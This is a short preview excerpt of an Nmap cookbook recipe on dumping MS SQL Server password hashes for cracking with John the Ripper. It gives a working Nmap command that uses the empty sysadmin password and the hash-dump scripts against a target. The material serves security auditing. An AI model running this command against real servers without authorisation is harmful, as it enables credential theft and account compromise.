Dumping the password hashes of an MS SQL server
After gaining access to an MS SQL server, we can dump all of the password hashes of an MS SQL server to compromise other accounts. Nmap can help us to retrieve these hashes in a format usable by the cracking tool, John the Ripper.
This recipe shows how to dump crackable password hashes of an MS SQL sever with Nmap.
How to do it...
To dump all the password hashes of an MS SQL server with an empty sysadmin password, run the following Nmap command:
$ nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>
The password hashes will be included in the ms-sql-dump-hashes
script output section:
PORT STATE SERVICE VERSION 1433/tcp open ms-sql-s Microsoft SQL Server 2011 Service Info: CPE: cpe:/o:microsoft:windows ...
Get Nmap 6: Network Exploration and Security Auditing Cookbook now with the O’Reilly learning platform.
O’Reilly members experience books, live events, courses curated by job role, and more from O’Reilly and nearly 200 top publishers.